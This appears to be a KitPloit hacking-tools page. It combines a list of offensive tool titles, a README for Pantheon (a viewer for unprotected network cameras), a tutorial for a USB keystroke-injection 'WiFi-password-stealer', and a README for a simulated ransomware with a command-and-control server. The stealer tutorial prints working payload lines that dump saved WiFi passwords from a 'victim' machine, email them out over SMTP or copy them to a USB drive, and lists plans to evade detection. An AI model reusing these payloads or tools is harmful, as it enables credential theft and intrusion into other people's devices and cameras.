- LSMS - Linux Security And Monitoring Scripts
- GodPotato - Local Privilege Escalation Tool From A Windows Service Accounts To NT AUTHORITY\SYSTEM
- Bypass-403 - A Simple Script Just Made For Self Use For Bypassing 403
- ThunderCloud - Cloud Exploit Framework
- GPT_Vuln-analyzer - Uses ChatGPT API And Python-Nmap Module To Use The GPT3 Model To Create Vulnerability Reports Based On Nmap Scan Data
- Kscan - Simple Asset Mapping Tool
- RedTeam-Physical-Tools - Red Team Toolkit - A Curated List Of Tools That Are Commonly Used In The Field For Physical Security, Red Teaming, And Tactical Covert Entry
- DNSWatch - DNS Traffic Sniffer and Analyzer
- IpGeo - Tool To Extract IP Addresses From Captured Network Traffic File
- TelegramRAT - Cross Platform Telegram Based RAT That Communicates Via Telegram To Evade Network Restrictions
- XSS-Exploitation-Tool - An XSS Exploitation Tool
Happy New Year wishes the KitPloit team!
Pantheon - Insecure Camera Parser
Pantheon is a GUI application that allows users to display information regarding network cameras in various countries as well as an integrated live-feed for non-protected cameras.
Functionalities
Pantheon allows users to execute an API crawler. There was original functionality without the use of any API's (like Insecam), but Google TOS kept getting in the way of the original scraping mechanism.
Installation
git clone https://github.com/josh0xA/Pantheon.git
cd Pantheon
pip3 install -r requirements.txt
Execution:python3 pantheon.py
- Note: I will later add a GUI installer to make it fully indepenent of a CLI
Windows
- You can just follow the steps above or download the official package here.
- Note, the PE binary of Pantheon was put together using pyinstaller, so Windows Defender might get a bit upset.
Ubuntu
- First, complete steps 1, 2 and 3 listed above.
chmod +x distros/ubuntu_install.sh
./distros/ubuntu_install.sh
Debian and Kali Linux
- First, complete steps 1, 2 and 3 listed above.
chmod +x distros/debian-kali_install.sh
./distros/debian-kali_install.sh
MacOS
- The regular installation steps above should suffice. If not, open up an issue.
Usage
(Enter) on a selected IP:Port to establish a Pantheon webview of the camera. (Use this at your own risk)
(Left-click) on a selected IP:Port to view the geolocation of the camera.
(Right-click) on a selected IP:Port to view the HTTP data of the camera (Ctrl+Left-click for Mac).
Adjust the map as you please to see the markers.
- Also note that this app is far from perfect and not every link that shows up is a live-feed, some are login pages (Do NOT attempt to login).
Ethical Notice
The developer of this program, Josh Schiavone, is not resposible for misuse of this data gathering tool. Pantheon simply provides information that can be indexed by any modern search engine. Do not try to establish unauthorized access to live feeds that are password protected - that is illegal. Furthermore, if you do choose to use Pantheon to view a live-feed, do so at your own risk. Pantheon was developed for educational purposes only. For further information, please visit: https://joshschiavone.com/panth_info/panth_ethical_notice.html
Licence
MIT License
Copyright (c) Josh Schiavone
- KitPloit - PenTest & Hacking Tools
- WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)
WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)
Have you ever watched a film where a hacker would plug-in, seemingly ordinary, USB drive into a victim's computer and steal data from it? - A proper wet dream for some.
Disclaimer: All content in this project is intended for security research purpose only.
Introduction
During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).
Setup
After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.
Prerequisites
Physical access to victim's computer.
Unlocked victim's computer.
Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.
Knowledge of victim's computer password for the Linux exploit.
Requirements - What you'll need
- Raspberry Pi Pico (RPi Pico)
- Micro USB to USB Cable
- Jumper Wire (optional)
- pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
- USB flash drive (for the exploit over physical medium only)
Note:
It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.
However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.
In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.
Keystroke injection tool
Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.
Keystroke injection
The payload uses STRING
command processes keystroke for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER
/SPACE
will simulate a press of keyboard keys.
Delays
We use DELAY
command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.
Exfiltration
Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, adversary can package it to avoid detection while sending data over the network, using encryption or compression. Two most common way of exfiltration are:
- Exfiltration over the network medium.
This approach was used for the Windows exploit. The whole payload can be seen here.
- Exfiltration over a physical medium.
This approach was used for the Linux exploit. The whole payload can be seen here.
Windows exploit
In order to use the Windows payload (payload1.dd
), you don't need to connect any jumper wire between pins.
Sending stolen data over email
Once passwords have been exported to the .txt
file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit a following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL
, SENDER_EMAIL
and yours email PASSWORD
. In addition, you could also update the body and the subject of the email.
STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587 |
Note:
After sending data over the email, the
.txt
file is deleted.You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.
Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.
Linux exploit
In order to use the Linux payload (payload2.dd
) you need to connect a jumper wire between GND
and GPIO5
in order to comply with the code in code.py
on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.
Storing stolen data to USB flash drive
Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK
with the name of your USB drive in two places.
STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt |
STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt |
In addition, you will also need to update the Linux PASSWORD
in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.
STRING echo PASSWORD | sudo -S echo |
STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')" |
Bash script
In order to run the wifi_passwords_print.sh
script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:
echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK
where PASSWORD
is your account's password and USBSTICK
is the name for your USB device.
Quick overview of the payload
NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses .ini-style
keyfile format and stores network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep
command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)
). While the positive lookbehind assertion will match at a certain position in the string, sc. at a position right after the keyword without making that text itself part of the match, the regex (?<=keyword).*
will match any text after the keyword. This allows the payload to match the values after SSID and psk (pre-shared key) keywords.
For more information about NetworkManager here is some useful links:
Exfiltrated data formatting
Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt
file.
WiFi-password-stealer/resources/wifi_pass.txt
Lines 1 to 5 in f5b3b11
Wireless_Network_Name Password | |
--------------------- -------- | |
WLAN1 pass1 | |
WLAN2 pass2 | |
WLAN3 pass3 |
USB Mass Storage Device Problem
One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees it as a USB keyboard. This isn't a default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND
) and pin 20 (GPIO15
). For more details visit this link.
Tip:
- Upload your payload to RPi Pico before you connect the pins.
- Don't solder the pins because you will probably want to change/update the payload at some point.
Payload Writer
When creating a functioning payload file, you can use the writer.py
script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, a name of the OS (windows or linux) and the name of the payload file (e.q. payload1.dd). Below you can find an example how to run the writer script when creating a Windows payload.
python3 writer.py windows payload1.dd
Limitations/Drawbacks
This pico-ducky currently works only on Windows OS.This attack requires physical access to an unlocked device in order to be successfully deployed.
The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.
Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.
Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.
The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.
Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.
If theCaps Lock
is ON, some of the payload code will not be executed and the exploit will fail.If the computer has a non-English Environment set, this exploit won't be successful.
Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.
To-Do List
- Fix
Caps Lock
bug. - Fix non-English Environment bug.
- Obfuscate the command prompt.
- Implement exfiltration over a physical medium.
- Create a payload for Linux.
- Encode/Encrypt exfiltrated data before sending it over email.
- Implement indicator of successfully completed exploit.
- Implement command history clean-up for Linux exploit.
- Enhance the Linux exploit in order to avoid usage of
sudo
.
RansomwareSim - A Simulated Ransomware
Overview
RansomwareSim is a simulated ransomware application developed for educational and training purposes. It is designed to demonstrate how ransomware encrypts files on a system and communicates with a command-and-control server. This tool is strictly for educational use and should not be used for malicious purposes.
Features
- Encrypts specified file types within a target directory.
- Changes the desktop wallpaper (Windows only).
- Creates&Delete a README file on the desktop with a simulated ransom note.
- Simulates communication with a command-and-control server to send system data and receive a decryption key.
- Decrypts files after receiving the correct key.
Usage
Important
: This tool should only be used in controlled environments where all participants have given consent. Do not use this tool on any system without explicit permission. For more, read SECURE
Requirements
- Python 3.x
- cryptography
- colorama
Installation
-
Clone the repository:
git clone https://github.com/HalilDeniz/RansomwareSim.git
-
Navigate to the project directory:
cd RansomwareSim
-
Install the required dependencies:
pip install -r requirements.txt
My Book
- Mastering Scapy: A Comprehensive Guide to Network Analysis
- Python Learning Roadmap in 30 Days: here
- Beginning Your Journey in Programming and Cybersecurity - Navigating the Digital Future
Running the Control Server
- Open
controlpanel.py
. - Start the server by running
controlpanel.py
. - The server will listen for connections from
RansomwareSim
and theDecoder
.
Running the Simulator
- Navigate to the directory containing
RansomwareSim
. - Modify the
main
function inencoder.py
to specify the target directory and other parameters. - Run
encoder.py
to start the encryption process. - Follow the instructions displayed on the console.
Running the Decoder
- Run
decoder.py
after the files have been encrypted. - Follow the prompts to input the decryption key.
Disclaimer
RansomwareSim is developed for educational purposes only. The creators of RansomwareSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.
Contributing
Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions.
- Fork the repository.
- Create a new branch for your feature or bug fix.
- Make your changes and commit them.
- Push your changes to your forked repository.
- Open a pull request in the main repository.
Contact
For any inquiries or further information, you can reach me through the following channels:
- LinkedIn : Halil Ibrahim Deniz
- TryHackMe: Halilovic
- Instagram: deniz.halil333
- YouTube : Halil Deniz
- Email : [email protected]